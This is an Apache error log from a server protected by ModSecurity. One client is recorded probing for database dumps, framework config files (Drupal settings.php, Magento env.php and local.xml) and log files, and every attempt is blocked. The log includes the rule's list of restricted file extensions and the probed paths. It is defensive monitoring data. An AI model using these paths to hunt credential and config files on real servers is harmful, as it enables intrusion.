[Tue Dec 02 08:38:24.160431 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAwAAAAU"]
[Tue Dec 02 08:38:24.160759 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAwAAAAU"]
[Tue Dec 02 08:38:24.160954 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAwAAAAU"]
[Tue Dec 02 08:38:24.224155 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS6XcJ0fE9xfoNXam56PBQAAAAU"]
[Tue Dec 02 08:38:24.224421 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS6XcJ0fE9xfoNXam56PBQAAAAU"]
[Tue Dec 02 08:38:24.224636 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS6XcJ0fE9xfoNXam56PBQAAAAU"]
[Tue Dec 02 08:38:24.255306 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/Thumbs.db"] [unique_id "aS6XcJ0fE9xfoNXam56PBgAAAAU"]
[Tue Dec 02 08:38:24.255635 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Thumbs.db"] [unique_id "aS6XcJ0fE9xfoNXam56PBgAAAAU"]
[Tue Dec 02 08:38:24.255862 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Thumbs.db"] [unique_id "aS6XcJ0fE9xfoNXam56PBgAAAAU"]
[Tue Dec 02 08:38:24.286726 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aS6XcJ0fE9xfoNXam56PBwAAAAU"]
[Tue Dec 02 08:38:24.287107 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aS6XcJ0fE9xfoNXam56PBwAAAAU"]
[Tue Dec 02 08:38:24.287373 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aS6XcJ0fE9xfoNXam56PBwAAAAU"]
[Tue Dec 02 08:38:24.317519 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Tue Dec 02 08:38:24.348032 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Tue Dec 02 08:38:24.379126 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/logs/application.log"] [unique_id "aS6XcJ0fE9xfoNXam56PCgAAAAU"]
[Tue Dec 02 08:38:24.379621 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/logs/application.log"] [unique_id "aS6XcJ0fE9xfoNXam56PCgAAAAU"]
[Tue Dec 02 08:38:24.379887 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/logs/application.log"] [unique_id "aS6XcJ0fE9xfoNXam56PCgAAAAU"]
[Tue Dec 02 08:38:24.410563 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sites/default/settings.php"] [unique_id "aS6XcJ0fE9xfoNXam56PCwAAAAU"]
[Tue Dec 02 08:38:24.410813 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sites/default/settings.php"] [unique_id "aS6XcJ0fE9xfoNXam56PCwAAAAU"]
[Tue Dec 02 08:38:24.411032 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sites/default/settings.php"] [unique_id "aS6XcJ0fE9xfoNXam56PCwAAAAU"]
[Tue Dec 02 08:38:24.473468 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Tue Dec 02 08:38:24.504489 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Tue Dec 02 08:38:24.535520 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aS6XcJ0fE9xfoNXam56PDwAAAAU"]
[Tue Dec 02 08:38:24.535934 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aS6XcJ0fE9xfoNXam56PDwAAAAU"]
[Tue Dec 02 08:38:24.536178 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aS6XcJ0fE9xfoNXam56PDwAAAAU"]
[Tue Dec 02 08:38:24.566734 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEAAAAAU"]
[Tue Dec 02 08:38:24.567129 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEAAAAAU"]
[Tue Dec 02 08:38:24.567336 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEAAAAAU"]
[Tue Dec 02 08:38:24.597958 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEQAAAAU"]
[Tue Dec 02 08:38:24.598363 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEQAAAAU"]
[Tue Dec 02 08:38:24.598560 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEQAAAAU"]
[Tue Dec 02 08:38:24.629207 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEgAAAAU"]
[Tue Dec 02 08:38:24.629582 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEgAAAAU"]
[Tue Dec 02 08:38:24.629798 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PEgAAAAU"]
[Tue Dec 02 08:38:24.694055 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/apache2
[Tue Dec 02 08:38:24.725108 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/nginx
[Tue Dec 02 08:38:24.755758 2025] [authz_core:error] [pid 464291] [client 18.133.245.137:33310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
[Tue Dec 02 08:38:24.786952 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/logs/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PFwAAAAU"]
[Tue Dec 02 08:38:24.787316 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/logs/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PFwAAAAU"]
[Tue Dec 02 08:38:24.787529 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/logs/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PFwAAAAU"]
